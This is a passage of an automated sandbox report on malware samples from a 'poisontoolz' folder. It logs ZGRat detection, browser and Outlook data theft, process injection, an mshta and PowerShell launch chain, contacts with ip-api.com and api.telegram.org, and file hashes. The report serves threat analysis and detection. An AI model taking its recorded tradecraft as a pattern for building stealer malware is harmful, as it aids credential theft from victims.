File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\unregmp2.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 147.166.122.92.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 28602f97dddaf89e2964b64eb3da1e2c
SHA1 aecc3c7eb77847cb2da332dd52fc3fbe638ecc0a
SHA256 9ac1642d0a892ca08352f86e2af64b31d30cb9ec2d5878a79db9b5ca403f9f55
SHA512 16c93c944f18ac8a3172f542d1672d129ba09ce5386a21d8aadd177f46cc9761650c596905f6897b5cfdafa7c94f0a950ba2937a92df2d013a937b6e301f5b5a

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 381fe4316fc3e55aa63d973eb0e3a051
SHA1 50ee6ce6fc1ad75e433902d6778f53a3d5d4f539
SHA256 de432c8dd36f22ca2adacc09067f14a1dc91a7740c2ca455c3b8ba69587cca43
SHA512 e2f5d37cbc43193465e024210e3823b342ac6b9e4ffad3789b37d5a77f7f4df0f5c66988d75109cbb87838fdcacabde38598ebb23cfb56d6b47cea6fac51784a

Analysis: behavioral6

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

141s

Max time network

157s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\unregmp2.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 wmploc.dll udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 4c5d72dd01816b33209d4344acd68b7a
SHA1 0c008710af3e0c8c40a9ca53179a6e4ea52af789
SHA256 28ae578bab0c7373335a84b701745d62693928cad75bf39c24f0c57d4f9fd94d
SHA512 7903dc52b64d25005ea4a7d37ebf96a0f1f40f8b349ebcf858db60aa0006176da65d66d71a5014b94c179e76c0cf54a2c650d36aaa15928c67ed5109daecd66d

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 fc240c081ec382df4b74d591d7d37a45
SHA1 396e9d8accb2ff8b32e6c3957808cb87d23ad47c
SHA256 8cfeb277627a0fc9f2596c83dc37f9a3d8871293cd88dadd08f32098bf936038
SHA512 d8f83773c330b88b43f9ebc6220aa98368854e44a75b73a8575e7171f6c32e784d404e5a2e2e7787d3c71c0cfecdbb983631b639d9fee879b374d498d2ef0ab7

Analysis: behavioral7

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

112s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2192 set thread context of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 55.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp

Files

memory/2192-1-0x0000000074910000-0x00000000750C0000-memory.dmp

memory/2192-0-0x0000000000CB0000-0x0000000000DF6000-memory.dmp

memory/2192-2-0x0000000005940000-0x0000000005950000-memory.dmp

memory/2192-3-0x0000000005770000-0x00000000058A6000-memory.dmp

memory/2192-4-0x0000000005A90000-0x0000000005BC6000-memory.dmp

memory/2192-6-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-10-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-14-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-18-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-28-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-38-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-48-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-50-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-52-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-56-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-58-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-54-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-64-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-68-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-66-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-62-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-60-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-46-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-44-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-42-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-40-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-36-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-34-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-32-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-30-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-26-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-24-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-22-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-20-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-16-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-12-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-8-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-5-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-937-0x00000000017C0000-0x00000000017C1000-memory.dmp

memory/2192-939-0x0000000005C00000-0x0000000005C4C000-memory.dmp

memory/2192-938-0x0000000005CD0000-0x0000000005D9E000-memory.dmp

memory/2192-940-0x0000000006600000-0x0000000006BA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/4360-946-0x0000000000400000-0x0000000000578000-memory.dmp

memory/4360-948-0x00000000058B0000-0x0000000005916000-memory.dmp

memory/4360-947-0x00000000057A0000-0x0000000005832000-memory.dmp

memory/4360-945-0x0000000074910000-0x00000000750C0000-memory.dmp

memory/4360-949-0x0000000006530000-0x000000000653A000-memory.dmp

memory/2192-944-0x0000000074910000-0x00000000750C0000-memory.dmp

memory/4360-950-0x0000000007760000-0x00000000077B0000-memory.dmp

memory/4360-990-0x0000000074910000-0x00000000750C0000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

148s

Max time network

149s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2236 set thread context of 2348 N/A C:\Users\Admin\AppData\Roaming\File1crypt.exe C:\Users\Admin\AppData\Roaming\File1crypt.exe
PID 3396 set thread context of 2112 N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe C:\Users\Admin\AppData\Roaming\File2crypt.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\File1crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\File1crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1176 wrote to memory of 4468 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 4468 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 4468 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
